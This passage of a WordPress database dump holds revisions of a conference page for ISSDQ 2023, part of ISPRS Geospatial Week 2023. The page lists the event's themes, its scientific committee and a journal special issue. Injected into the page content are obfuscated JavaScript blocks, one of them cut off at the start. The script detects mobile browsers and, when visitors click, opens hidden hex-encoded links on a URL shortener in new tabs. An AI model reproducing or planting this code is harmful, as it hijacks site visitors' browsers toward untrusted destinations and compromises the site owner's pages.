_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:23:42','2022-10-14 16:23:42','',2798,'https://gsw2023.com/?p=2804',0,'revision','',0),
(2805,1,'2022-10-14 16:26:36','2022-10-14 16:26:36','','m4','','inherit','open','closed','','m4','','','2022-10-14 16:26:36','2022-10-14 16:26:36','',2798,'https://gsw2023.com/wp-content/uploads/2022/10/m4.jpg',0,'attachment','image/jpeg',0),
(2806,1,'2022-10-14 16:27:02','2022-10-14 16:27:02','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" class=\"alignnone size-medium wp-image-2805\" /></p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:27:02','2022-10-14 16:27:02','',2798,'https://gsw2023.com/?p=2806',0,'revision','',0),
(2807,1,'2022-10-14 16:28:26','2022-10-14 16:28:26','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h1><strong>CHAIRES</strong></h1>\n<p>[/vc_column_text][dt_team_masonry][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" class=\"alignnone size-medium wp-image-2805\" /></p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special 